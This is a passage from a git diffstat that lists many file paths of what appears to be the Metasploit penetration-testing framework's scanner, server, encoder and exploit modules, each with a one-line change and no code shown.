.../scanner/http/rails_xml_yaml_scanner.rb | 2 +- modules/auxiliary/scanner/http/replace_ext.rb | 2 +- .../auxiliary/scanner/http/rewrite_proxy_bypass.rb | 2 +- .../auxiliary/scanner/http/rfcode_reader_enum.rb | 2 +- modules/auxiliary/scanner/http/rips_traversal.rb | 2 +- modules/auxiliary/scanner/http/robots_txt.rb | 2 +- modules/auxiliary/scanner/http/s40_traversal.rb | 2 +- .../scanner/http/sap_businessobjects_user_brute.rb | 2 +- .../http/sap_businessobjects_user_brute_web.rb | 2 +- .../scanner/http/sap_businessobjects_user_enum.rb | 2 +- .../http/sap_businessobjects_version_enum.rb | 2 +- modules/auxiliary/scanner/http/scraper.rb | 2 +- modules/auxiliary/scanner/http/sentry_cdu_enum.rb | 2 +- .../scanner/http/servicedesk_plus_traversal.rb | 2 +- modules/auxiliary/scanner/http/sevone_enum.rb | 2 +- .../scanner/http/simple_webserver_traversal.rb | 2 +- .../scanner/http/smt_ipmi_49152_exposure.rb | 2 +- .../auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb | 2 +- .../scanner/http/smt_ipmi_static_cert_scanner.rb | 2 +- .../http/smt_ipmi_url_redirect_traversal.rb | 2 +- modules/auxiliary/scanner/http/soap_xml.rb | 2 +- modules/auxiliary/scanner/http/sockso_traversal.rb | 2 +- modules/auxiliary/scanner/http/splunk_web_login.rb | 2 +- .../auxiliary/scanner/http/squid_pivot_scanning.rb | 2 +- .../scanner/http/squiz_matrix_user_enum.rb | 2 +- modules/auxiliary/scanner/http/ssl.rb | 2 +- modules/auxiliary/scanner/http/ssl_version.rb | 2 +- .../support_center_plus_directory_traversal.rb | 2 +- modules/auxiliary/scanner/http/svn_scanner.rb | 2 +- modules/auxiliary/scanner/http/svn_wcdb_scanner.rb | 2 +- .../scanner/http/sybase_easerver_traversal.rb | 2 +- .../scanner/http/symantec_brightmail_logfile.rb | 2 +- .../scanner/http/symantec_web_gateway_login.rb | 2 +- .../auxiliary/scanner/http/titan_ftp_admin_pwd.rb | 2 +- modules/auxiliary/scanner/http/title.rb | 2 +- modules/auxiliary/scanner/http/tomcat_enum.rb | 2 +- modules/auxiliary/scanner/http/tomcat_mgr_login.rb | 2 +- .../scanner/http/tplink_traversal_noauth.rb | 2 +- modules/auxiliary/scanner/http/trace.rb | 2 +- modules/auxiliary/scanner/http/trace_axd.rb | 2 +- modules/auxiliary/scanner/http/typo3_bruteforce.rb | 2 +- modules/auxiliary/scanner/http/vcms_login.rb | 2 +- modules/auxiliary/scanner/http/verb_auth_bypass.rb | 2 +- modules/auxiliary/scanner/http/vhost_scanner.rb | 2 +- .../scanner/http/wangkongbao_traversal.rb | 2 +- modules/auxiliary/scanner/http/web_vulndb.rb | 2 +- .../auxiliary/scanner/http/webdav_internal_ip.rb | 2 +- modules/auxiliary/scanner/http/webdav_scanner.rb | 2 +- .../scanner/http/webdav_website_content.rb | 2 +- .../scanner/http/webpagetest_traversal.rb | 2 +- .../auxiliary/scanner/http/wildfly_traversal.rb | 2 +- .../scanner/http/wordpress_cp_calendar_sqli.rb | 2 +- .../scanner/http/wordpress_ghost_scanner.rb | 2 +- .../auxiliary/scanner/http/wordpress_login_enum.rb | 2 +- .../scanner/http/wordpress_multicall_creds.rb | 2 +- .../scanner/http/wordpress_pingback_access.rb | 2 +- .../auxiliary/scanner/http/wordpress_scanner.rb | 2 +- .../scanner/http/wordpress_xmlrpc_login.rb | 2 +- .../scanner/http/wp_contus_video_gallery_sqli.rb | 2 +- .../scanner/http/wp_dukapress_file_read.rb | 2 +- .../scanner/http/wp_gimedia_library_file_read.rb | 2 +- .../scanner/http/wp_mobile_pack_info_disclosure.rb | 2 +- .../scanner/http/wp_mobileedition_file_read.rb | 2 +- .../scanner/http/wp_nextgen_galley_file_read.rb | 2 +- .../scanner/http/wp_simple_backup_file_read.rb | 2 +- .../http/wp_subscribe_comments_file_read.rb | 2 +- modules/auxiliary/scanner/http/xpath.rb | 2 +- modules/auxiliary/scanner/http/yaws_traversal.rb | 2 +- modules/auxiliary/scanner/http/zabbix_login.rb | 2 +- .../http/zenworks_assetmanagement_fileaccess.rb | 2 +- .../http/zenworks_assetmanagement_getconfig.rb | 2 +- modules/auxiliary/scanner/imap/imap_version.rb | 2 +- modules/auxiliary/scanner/ip/ipidseq.rb | 2 +- modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb | 2 +- modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb | 2 +- modules/auxiliary/scanner/ipmi/ipmi_version.rb | 2 +- modules/auxiliary/scanner/kademlia/server_info.rb | 2 +- modules/auxiliary/scanner/llmnr/query.rb | 2 +- .../auxiliary/scanner/lotus/lotus_domino_hashes.rb | 2 +- .../auxiliary/scanner/lotus/lotus_domino_login.rb | 2 +- .../scanner/lotus/lotus_domino_version.rb | 2 +- modules/auxiliary/scanner/mdns/query.rb | 2 +- modules/auxiliary/scanner/misc/cctv_dvr_login.rb | 2 +- .../scanner/misc/dahua_dvr_auth_bypass.rb | 2 +- .../scanner/misc/dvr_config_disclosure.rb | 2 +- .../auxiliary/scanner/misc/ib_service_mgr_info.rb | 2 +- modules/auxiliary/scanner/misc/java_rmi_server.rb | 2 +- modules/auxiliary/scanner/misc/oki_scanner.rb | 2 +- .../scanner/misc/poisonivy_control_scanner.rb | 2 +- .../scanner/misc/raysharp_dvr_passwords.rb | 2 +- modules/auxiliary/scanner/misc/redis_server.rb | 2 +- .../scanner/misc/rosewill_rxs3211_passwords.rb | 2 +- .../scanner/misc/sercomm_backdoor_scanner.rb | 2 +- .../auxiliary/scanner/misc/sunrpc_portmapper.rb | 2 +- .../scanner/misc/zenworks_preboot_fileaccess.rb | 2 +- modules/auxiliary/scanner/mongodb/mongodb_login.rb | 2 +- modules/auxiliary/scanner/motorola/timbuktu_udp.rb | 2 +- modules/auxiliary/scanner/msf/msf_rpc_login.rb | 2 +- modules/auxiliary/scanner/msf/msf_web_login.rb | 2 +- modules/auxiliary/scanner/mssql/mssql_hashdump.rb | 2 +- modules/auxiliary/scanner/mssql/mssql_login.rb | 2 +- modules/auxiliary/scanner/mssql/mssql_ping.rb | 2 +- .../auxiliary/scanner/mssql/mssql_schemadump.rb | 2 +- .../scanner/mysql/mysql_authbypass_hashdump.rb | 2 +- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 2 +- modules/auxiliary/scanner/mysql/mysql_hashdump.rb | 2 +- modules/auxiliary/scanner/mysql/mysql_login.rb | 2 +- .../auxiliary/scanner/mysql/mysql_schemadump.rb | 2 +- modules/auxiliary/scanner/mysql/mysql_version.rb | 2 +- .../auxiliary/scanner/natpmp/natpmp_portscan.rb | 2 +- .../auxiliary/scanner/nessus/nessus_ntp_login.rb | 2 +- .../auxiliary/scanner/nessus/nessus_rest_login.rb | 2 +- .../scanner/nessus/nessus_xmlrpc_login.rb | 2 +- .../auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb | 2 +- modules/auxiliary/scanner/netbios/nbname.rb | 2 +- modules/auxiliary/scanner/netbios/nbname_probe.rb | 2 +- .../auxiliary/scanner/nexpose/nexpose_api_login.rb | 2 +- modules/auxiliary/scanner/nfs/nfsmount.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_monlist.rb | 2 +- .../auxiliary/scanner/ntp/ntp_nak_to_the_future.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb | 2 +- .../auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_readvar.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb | 2 +- .../scanner/openvas/openvas_gsad_login.rb | 2 +- .../auxiliary/scanner/openvas/openvas_omp_login.rb | 2 +- .../auxiliary/scanner/openvas/openvas_otp_login.rb | 2 +- modules/auxiliary/scanner/oracle/emc_sid.rb | 2 +- modules/auxiliary/scanner/oracle/isqlplus_login.rb | 2 +- .../auxiliary/scanner/oracle/isqlplus_sidbrute.rb | 2 +- .../auxiliary/scanner/oracle/oracle_hashdump.rb | 2 +- modules/auxiliary/scanner/oracle/oracle_login.rb | 2 +- modules/auxiliary/scanner/oracle/sid_brute.rb | 2 +- modules/auxiliary/scanner/oracle/sid_enum.rb | 2 +- modules/auxiliary/scanner/oracle/spy_sid.rb | 2 +- .../auxiliary/scanner/oracle/tnslsnr_version.rb | 2 +- .../auxiliary/scanner/oracle/tnspoison_checker.rb | 2 +- modules/auxiliary/scanner/oracle/xdb_sid.rb | 2 +- modules/auxiliary/scanner/oracle/xdb_sid_brute.rb | 2 +- .../scanner/pcanywhere/pcanywhere_login.rb | 2 +- .../auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb | 2 +- .../auxiliary/scanner/pcanywhere/pcanywhere_udp.rb | 2 +- modules/auxiliary/scanner/pop3/pop3_login.rb | 2 +- modules/auxiliary/scanner/pop3/pop3_version.rb | 2 +- modules/auxiliary/scanner/portmap/portmap_amp.rb | 2 +- modules/auxiliary/scanner/portscan/ack.rb | 2 +- modules/auxiliary/scanner/portscan/ftpbounce.rb | 2 +- modules/auxiliary/scanner/portscan/syn.rb | 2 +- modules/auxiliary/scanner/portscan/tcp.rb | 2 +- modules/auxiliary/scanner/portscan/xmas.rb | 2 +- .../postgres/postgres_dbname_flag_injection.rb | 2 +- .../scanner/postgres/postgres_hashdump.rb | 2 +- .../auxiliary/scanner/postgres/postgres_login.rb | 2 +- .../scanner/postgres/postgres_schemadump.rb | 2 +- .../auxiliary/scanner/postgres/postgres_version.rb | 2 +- .../scanner/printer/printer_delete_file.rb | 2 +- .../scanner/printer/printer_download_file.rb | 2 +- .../auxiliary/scanner/printer/printer_env_vars.rb | 2 +- .../auxiliary/scanner/printer/printer_list_dir.rb | 2 +- .../scanner/printer/printer_list_volumes.rb | 2 +- .../scanner/printer/printer_ready_message.rb | 2 +- .../scanner/printer/printer_upload_file.rb | 2 +- .../scanner/printer/printer_version_info.rb | 2 +- modules/auxiliary/scanner/quake/server_info.rb | 2 +- modules/auxiliary/scanner/rdp/ms12_020_check.rb | 2 +- modules/auxiliary/scanner/redis/file_upload.rb | 2 +- modules/auxiliary/scanner/redis/redis_server.rb | 2 +- modules/auxiliary/scanner/rogue/rogue_recv.rb | 2 +- modules/auxiliary/scanner/rogue/rogue_send.rb | 2 +- modules/auxiliary/scanner/rservices/rexec_login.rb | 2 +- .../auxiliary/scanner/rservices/rlogin_login.rb | 2 +- modules/auxiliary/scanner/rservices/rsh_login.rb | 2 +- modules/auxiliary/scanner/rsync/modules_list.rb | 2 +- .../sap/sap_ctc_verb_tampering_user_mgmt.rb | 2 +- .../scanner/sap/sap_hostctrl_getcomputersystem.rb | 2 +- .../auxiliary/scanner/sap/sap_icf_public_info.rb | 2 +- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 2 +- .../auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb | 2 +- .../scanner/sap/sap_mgmt_con_brute_login.rb | 2 +- .../scanner/sap/sap_mgmt_con_extractusers.rb | 2 +- .../scanner/sap/sap_mgmt_con_getaccesspoints.rb | 2 +- .../auxiliary/scanner/sap/sap_mgmt_con_getenv.rb | 2 +- .../scanner/sap/sap_mgmt_con_getlogfiles.rb | 2 +- .../scanner/sap/sap_mgmt_con_getprocesslist.rb | 2 +- .../sap/sap_mgmt_con_getprocessparameter.rb | 2 +- .../scanner/sap/sap_mgmt_con_instanceproperties.rb | 2 +- .../scanner/sap/sap_mgmt_con_listlogfiles.rb | 2 +- .../scanner/sap/sap_mgmt_con_startprofile.rb | 2 +- .../auxiliary/scanner/sap/sap_mgmt_con_version.rb | 2 +- .../scanner/sap/sap_router_info_request.rb | 2 +- .../scanner/sap/sap_router_portscanner.rb | 2 +- .../auxiliary/scanner/sap/sap_service_discovery.rb | 2 +- modules/auxiliary/scanner/sap/sap_smb_relay.rb | 2 +- .../scanner/sap/sap_soap_bapi_user_create1.rb | 2 +- .../scanner/sap/sap_soap_rfc_brute_login.rb | 2 +- ...oap_rfc_dbmcli_sxpg_call_system_command_exec.rb | 2 +- .../sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb | 2 +- .../sap/sap_soap_rfc_eps_get_directory_listing.rb | 2 +- .../sap_soap_rfc_pfl_check_os_file_existence.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb | 2 +- .../scanner/sap/sap_soap_rfc_read_table.rb | 2 +- .../scanner/sap/sap_soap_rfc_rzl_read_dir.rb | 2 +- .../sap/sap_soap_rfc_susr_rfc_user_interface.rb | 2 +- .../sap/sap_soap_rfc_sxpg_call_system_exec.rb | 2 +- .../scanner/sap/sap_soap_rfc_sxpg_command_exec.rb | 2 +- .../scanner/sap/sap_soap_rfc_system_info.rb | 2 +- .../scanner/sap/sap_soap_th_saprel_disclosure.rb | 2 +- .../scanner/sap/sap_web_gui_brute_login.rb | 2 +- .../auxiliary/scanner/scada/digi_addp_reboot.rb | 2 +- .../auxiliary/scanner/scada/digi_addp_version.rb | 2 +- .../scanner/scada/digi_realport_serialport_scan.rb | 2 +- .../scanner/scada/digi_realport_version.rb | 2 +- .../scada/indusoft_ntwebserver_fileaccess.rb | 2 +- modules/auxiliary/scanner/scada/koyo_login.rb | 2 +- .../auxiliary/scanner/scada/modbus_findunitid.rb | 2 +- modules/auxiliary/scanner/scada/modbusclient.rb | 2 +- modules/auxiliary/scanner/scada/modbusdetect.rb | 2 +- .../scanner/scada/sielco_winlog_fileaccess.rb | 2 +- modules/auxiliary/scanner/sip/enumerator.rb | 2 +- modules/auxiliary/scanner/sip/enumerator_tcp.rb | 2 +- modules/auxiliary/scanner/sip/options.rb | 2 +- modules/auxiliary/scanner/sip/options_tcp.rb | 2 +- modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb | 2 +- modules/auxiliary/scanner/smb/pipe_auditor.rb | 2 +- .../auxiliary/scanner/smb/pipe_dcerpc_auditor.rb | 2 +- .../auxiliary/scanner/smb/psexec_loggedin_users.rb | 2 +- modules/auxiliary/scanner/smb/smb2.rb | 2 +- modules/auxiliary/scanner/smb/smb_enum_gpp.rb | 2 +- modules/auxiliary/scanner/smb/smb_enumshares.rb | 2 +- modules/auxiliary/scanner/smb/smb_enumusers.rb | 2 +- .../auxiliary/scanner/smb/smb_enumusers_domain.rb | 2 +- modules/auxiliary/scanner/smb/smb_login.rb | 2 +- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 2 +- modules/auxiliary/scanner/smb/smb_uninit_cred.rb | 2 +- modules/auxiliary/scanner/smb/smb_version.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_enum.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_relay.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_version.rb | 2 +- modules/auxiliary/scanner/snmp/aix_version.rb | 2 +- modules/auxiliary/scanner/snmp/arris_dg950.rb | 2 +- modules/auxiliary/scanner/snmp/brocade_enumhash.rb | 2 +- .../auxiliary/scanner/snmp/cisco_config_tftp.rb | 2 +- .../auxiliary/scanner/snmp/cisco_upload_file.rb | 2 +- modules/auxiliary/scanner/snmp/netopia_enum.rb | 2 +- modules/auxiliary/scanner/snmp/sbg6580_enum.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enum.rb | 2 +- .../scanner/snmp/snmp_enum_hp_laserjet.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enumshares.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enumusers.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_login.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_set.rb | 2 +- modules/auxiliary/scanner/snmp/ubee_ddw3611.rb | 2 +- .../scanner/snmp/xerox_workcentre_enumusers.rb | 2 +- .../scanner/ssh/cerberus_sftp_enumusers.rb | 2 +- modules/auxiliary/scanner/ssh/detect_kippo.rb | 2 +- modules/auxiliary/scanner/ssh/fortinet_backdoor.rb | 2 +- modules/auxiliary/scanner/ssh/karaf_login.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- .../auxiliary/scanner/ssh/ssh_identify_pubkeys.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_login.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_version.rb | 2 +- modules/auxiliary/scanner/ssl/openssl_ccs.rb | 2 +- .../auxiliary/scanner/ssl/openssl_heartbleed.rb | 2 +- modules/auxiliary/scanner/steam/server_info.rb | 2 +- modules/auxiliary/scanner/telephony/wardial.rb | 2 +- .../scanner/telnet/brocade_enable_login.rb | 2 +- .../scanner/telnet/lantronix_telnet_password.rb | 2 +- .../scanner/telnet/lantronix_telnet_version.rb | 2 +- .../scanner/telnet/telnet_encrypt_overflow.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_login.rb | 2 +- .../auxiliary/scanner/telnet/telnet_ruggedcom.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_version.rb | 2 +- .../scanner/tftp/ipswitch_whatsupgold_tftp.rb | 2 +- modules/auxiliary/scanner/tftp/netdecision_tftp.rb | 2 +- modules/auxiliary/scanner/tftp/tftpbrute.rb | 2 +- modules/auxiliary/scanner/udp_scanner_template.rb | 2 +- modules/auxiliary/scanner/upnp/ssdp_amp.rb | 2 +- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 2 +- .../auxiliary/scanner/vmware/esx_fingerprint.rb | 2 +- modules/auxiliary/scanner/vmware/vmauthd_login.rb | 2 +- .../auxiliary/scanner/vmware/vmauthd_version.rb | 2 +- .../scanner/vmware/vmware_enum_permissions.rb | 2 +- .../scanner/vmware/vmware_enum_sessions.rb | 2 +- .../auxiliary/scanner/vmware/vmware_enum_users.rb | 2 +- .../auxiliary/scanner/vmware/vmware_enum_vms.rb | 2 +- .../scanner/vmware/vmware_host_details.rb | 2 +- .../auxiliary/scanner/vmware/vmware_http_login.rb | 2 +- .../scanner/vmware/vmware_screenshot_stealer.rb | 2 +- .../scanner/vmware/vmware_server_dir_trav.rb | 2 +- .../vmware/vmware_update_manager_traversal.rb | 2 +- modules/auxiliary/scanner/vnc/vnc_login.rb | 2 +- modules/auxiliary/scanner/vnc/vnc_none_auth.rb | 2 +- modules/auxiliary/scanner/voice/recorder.rb | 2 +- .../auxiliary/scanner/vxworks/wdbrpc_bootline.rb | 2 +- .../auxiliary/scanner/vxworks/wdbrpc_version.rb | 2 +- .../auxiliary/scanner/winrm/winrm_auth_methods.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_login.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 2 +- modules/auxiliary/scanner/x11/open_x11.rb | 2 +- .../server/android_browsable_msf_launch.rb | 2 +- .../auxiliary/server/android_mercury_parseuri.rb | 2 +- modules/auxiliary/server/browser_autopwn.rb | 2 +- modules/auxiliary/server/browser_autopwn2.rb | 2 +- modules/auxiliary/server/capture/drda.rb | 2 +- modules/auxiliary/server/capture/ftp.rb | 2 +- modules/auxiliary/server/capture/http.rb | 2 +- modules/auxiliary/server/capture/http_basic.rb | 2 +- .../server/capture/http_javascript_keylogger.rb | 2 +- modules/auxiliary/server/capture/http_ntlm.rb | 2 +- modules/auxiliary/server/capture/imap.rb | 2 +- modules/auxiliary/server/capture/mssql.rb | 2 +- modules/auxiliary/server/capture/mysql.rb | 2 +- modules/auxiliary/server/capture/pop3.rb | 2 +- modules/auxiliary/server/capture/postgresql.rb | 2 +- .../auxiliary/server/capture/printjob_capture.rb | 2 +- modules/auxiliary/server/capture/sip.rb | 2 +- modules/auxiliary/server/capture/smb.rb | 2 +- modules/auxiliary/server/capture/smtp.rb | 2 +- modules/auxiliary/server/capture/telnet.rb | 2 +- modules/auxiliary/server/capture/vnc.rb | 2 +- modules/auxiliary/server/dhclient_bash_env.rb | 2 +- modules/auxiliary/server/dhcp.rb | 2 +- modules/auxiliary/server/dns/spoofhelper.rb | 2 +- modules/auxiliary/server/fakedns.rb | 2 +- modules/auxiliary/server/ftp.rb | 2 +- modules/auxiliary/server/http_ntlmrelay.rb | 2 +- modules/auxiliary/server/icmp_exfil.rb | 2 +- .../auxiliary/server/jsse_skiptls_mitm_proxy.rb | 2 +- modules/auxiliary/server/ms15_134_mcl_leak.rb | 2 +- .../server/openssl_altchainsforgery_mitm_proxy.rb | 2 +- .../server/openssl_heartbeat_client_memory.rb | 2 +- modules/auxiliary/server/pxeexploit.rb | 2 +- modules/auxiliary/server/socks4a.rb | 2 +- modules/auxiliary/server/socks_unc.rb | 2 +- modules/auxiliary/server/tftp.rb | 2 +- modules/auxiliary/server/tnftp_savefile.rb | 2 +- modules/auxiliary/server/webkit_xslt_dropper.rb | 2 +- .../auxiliary/server/wget_symlink_file_write.rb | 2 +- modules/auxiliary/server/wpad.rb | 2 +- modules/auxiliary/sniffer/psnuffle.rb | 2 +- modules/auxiliary/spoof/arp/arp_poisoning.rb | 2 +- modules/auxiliary/spoof/cisco/cdp.rb | 2 +- modules/auxiliary/spoof/cisco/dtp.rb | 2 +- modules/auxiliary/spoof/dns/bailiwicked_domain.rb | 2 +- modules/auxiliary/spoof/dns/bailiwicked_host.rb | 2 +- modules/auxiliary/spoof/dns/compare_results.rb | 2 +- modules/auxiliary/spoof/llmnr/llmnr_response.rb | 2 +- modules/auxiliary/spoof/nbns/nbns_response.rb | 2 +- modules/auxiliary/spoof/replay/pcap_replay.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb | 2 +- .../dbms_cdc_subscribe_activate_subscription.rb | 2 +- .../auxiliary/sqli/oracle/dbms_export_extension.rb | 2 +- .../sqli/oracle/dbms_metadata_get_granted_xml.rb | 2 +- .../auxiliary/sqli/oracle/dbms_metadata_get_xml.rb | 2 +- .../auxiliary/sqli/oracle/dbms_metadata_open.rb | 2 +- modules/auxiliary/sqli/oracle/droptable_trigger.rb | 2 +- modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb | 2 +- modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb | 2 +- .../auxiliary/sqli/oracle/lt_compressworkspace.rb | 2 +- .../auxiliary/sqli/oracle/lt_findricset_cursor.rb | 2 +- modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb | 2 +- .../auxiliary/sqli/oracle/lt_removeworkspace.rb | 2 +- .../auxiliary/sqli/oracle/lt_rollbackworkspace.rb | 2 +- modules/auxiliary/voip/asterisk_login.rb | 2 +- modules/auxiliary/voip/cisco_cucdm_call_forward.rb | 2 +- modules/auxiliary/voip/cisco_cucdm_speed_dials.rb | 2 +- modules/auxiliary/voip/sip_deregister.rb | 2 +- modules/auxiliary/voip/sip_invite_spoof.rb | 2 +- modules/auxiliary/voip/telisca_ips_lock_control.rb | 2 +- .../auxiliary/vsploit/malware/dns/dns_mariposa.rb | 2 +- modules/auxiliary/vsploit/malware/dns/dns_query.rb | 2 +- modules/auxiliary/vsploit/malware/dns/dns_zeus.rb | 2 +- modules/auxiliary/vsploit/pii/email_pii.rb | 2 +- modules/auxiliary/vsploit/pii/web_pii.rb | 2 +- modules/encoders/cmd/echo.rb | 2 +- modules/encoders/cmd/generic_sh.rb | 2 +- modules/encoders/cmd/ifs.rb | 2 +- modules/encoders/cmd/perl.rb | 2 +- modules/encoders/cmd/powershell_base64.rb | 2 +- modules/encoders/cmd/printf_php_mq.rb | 2 +- modules/encoders/generic/eicar.rb | 2 +- modules/encoders/generic/none.rb | 2 +- modules/encoders/mipsbe/byte_xori.rb | 2 +- modules/encoders/mipsbe/longxor.rb | 2 +- modules/encoders/mipsle/byte_xori.rb | 2 +- modules/encoders/mipsle/longxor.rb | 2 +- modules/encoders/php/base64.rb | 2 +- modules/encoders/ppc/longxor.rb | 2 +- modules/encoders/ppc/longxor_tag.rb | 2 +- modules/encoders/sparc/longxor_tag.rb | 2 +- modules/encoders/x64/xor.rb | 2 +- modules/encoders/x86/add_sub.rb | 2 +- modules/encoders/x86/alpha_mixed.rb | 2 +- modules/encoders/x86/alpha_upper.rb | 2 +- modules/encoders/x86/avoid_underscore_tolower.rb | 2 +- modules/encoders/x86/avoid_utf8_tolower.rb | 2 +- modules/encoders/x86/bloxor.rb | 2 +- modules/encoders/x86/bmp_polyglot.rb | 2 +- modules/encoders/x86/call4_dword_xor.rb | 2 +- modules/encoders/x86/context_cpuid.rb | 2 +- modules/encoders/x86/context_stat.rb | 2 +- modules/encoders/x86/context_time.rb | 2 +- modules/encoders/x86/countdown.rb | 2 +- modules/encoders/x86/fnstenv_mov.rb | 2 +- modules/encoders/x86/jmp_call_additive.rb | 2 +- modules/encoders/x86/nonalpha.rb | 2 +- modules/encoders/x86/nonupper.rb | 2 +- modules/encoders/x86/opt_sub.rb | 2 +- modules/encoders/x86/shikata_ga_nai.rb | 2 +- modules/encoders/x86/single_static_bit.rb | 2 +- modules/encoders/x86/unicode_mixed.rb | 2 +- modules/encoders/x86/unicode_upper.rb | 2 +- modules/exploits/aix/local/ibstat_path.rb | 2 +- modules/exploits/aix/rpc_cmsd_opcode21.rb | 2 +- modules/exploits/aix/rpc_ttdbserverd_realpath.rb | 2 +- modules/exploits/android/adb/adb_server_exec.rb | 2 +- .../android/browser/samsung_knox_smdm_url.rb | 2 +- .../browser/webview_addjavascriptinterface.rb | 2 +- .../fileformat/adobe_reader_pdf_js_interface.rb | 2 +- modules/exploits/android/local/futex_requeue.rb | 2 +- .../exploits/apple_ios/browser/safari_libtiff.rb | 2 +- .../exploits/apple_ios/email/mobilemail_libtiff.rb | 2 +- .../exploits/apple_ios/ssh/cydia_default_ssh.rb | 2 +- .../exploits/bsdi/softcart/mercantec_softcart.rb | 2 +- modules/exploits/dialup/multi/login/manyargs.rb | 2 +- modules/exploits/firefox/local/exec_shellcode.rb | 2 +- modules/exploits/freebsd/ftp/proftp_telnet_iac.rb | 2 +- .../exploits/freebsd/http/watchguard_cmd_exec.rb | 2 +- modules/exploits/freebsd/local/mmap.rb | 2 +- .../freebsd/local/watchguard_fix_corrupt_mail.rb | 2 +- .../freebsd/misc/citrix_netscaler_soap_bof.rb | 2 +- modules/exploits/freebsd/samba/trans2open.rb | 2 +- modules/exploits/freebsd/tacacs/xtacacsd_report.rb | 2 +- .../freebsd/telnet/telnet_encrypt_keyid.rb | 2 +- modules/exploits/hpux/lpd/cleanup_exec.rb | 2 +- modules/exploits/irix/lpd/tagprinter_exec.rb | 2 +- .../linux/antivirus/escan_password_exec.rb | 2 +- .../linux/browser/adobe_flashplayer_aslaunch.rb | 2 +- modules/exploits/linux/ftp/proftp_sreplace.rb | 2 +- modules/exploits/linux/ftp/proftp_telnet_iac.rb | 2 +- modules/exploits/linux/games/ut2004_secure.rb | 2 +- .../linux/http/accellion_fta_getstatus_oauth.rb | 2 +- .../linux/http/advantech_switch_bash_env_exec.rb | 2 +- .../exploits/linux/http/airties_login_cgi_bof.rb | 2 +- .../linux/http/alcatel_omnipcx_mastercgi_exec.rb | 2 +- .../exploits/linux/http/alienvault_sqli_exec.rb | 2 +- modules/exploits/linux/http/astium_sqli_upload.rb | 2 +- modules/exploits/linux/http/belkin_login_bof.rb | 2 +- modules/exploits/linux/http/centreon_sqli_exec.rb | 2 +- .../linux/http/cfme_manageiq_evm_upload_exec.rb | 2 +- modules/exploits/linux/http/ddwrt_cgibin_exec.rb | 2 +- .../linux/http/dlink_authentication_cgi_bof.rb | 2 +- .../linux/http/dlink_command_php_exec_noauth.rb | 2 +- .../exploits/linux/http/dlink_dcs931l_upload.rb | 2 +- ..._930l_authenticated_remote_command_execution.rb | 2 +- .../linux/http/dlink_diagnostic_exec_noauth.rb | 2 +- .../linux/http/dlink_dir300_exec_telnet.rb | 2 +- .../linux/http/dlink_dir605l_captcha_bof.rb | 2 +- .../exploits/linux/http/dlink_dir615_up_exec.rb | 2 +- .../linux/http/dlink_dspw110_cookie_noauth_exec.rb | 2 +- .../linux/http/dlink_dspw215_info_cgi_bof.rb | 2 +- .../exploits/linux/http/dlink_hedwig_cgi_bof.rb | 2 +- modules/exploits/linux/http/dlink_hnap_bof.rb | 2 +- .../linux/http/dlink_hnap_header_exec_noauth.rb | 2 +- .../exploits/linux/http/dlink_upnp_exec_noauth.rb | 2 +- modules/exploits/linux/http/dolibarr_cmd_exec.rb | 2 +- .../exploits/linux/http/dreambox_openpli_shell.rb | 2 +- modules/exploits/linux/http/efw_chpasswd_exec.rb | 2 +- modules/exploits/linux/http/esva_exec.rb | 2 +- modules/exploits/linux/http/f5_icall_cmd.rb | 2 +- modules/exploits/linux/http/f5_icontrol_exec.rb | 2 +- .../http/foreman_openstack_satellite_code_exec.rb | 2 +- modules/exploits/linux/http/fritzbox_echo_exec.rb | 2 +- modules/exploits/linux/http/gitlist_exec.rb | 2 +- modules/exploits/linux/http/gpsd_format_string.rb | 2 +- .../linux/http/groundwork_monarch_cmd_exec.rb | 2 +- .../exploits/linux/http/hp_system_management.rb | 2 +- modules/exploits/linux/http/kloxo_sqli.rb | 2 +- .../exploits/linux/http/lifesize_uvc_ping_rce.rb | 2 +- modules/exploits/linux/http/linksys_apply_cgi.rb | 2 +- .../linux/http/linksys_e1500_apply_exec.rb | 2 +- .../exploits/linux/http/linksys_themoon_exec.rb | 2 +- 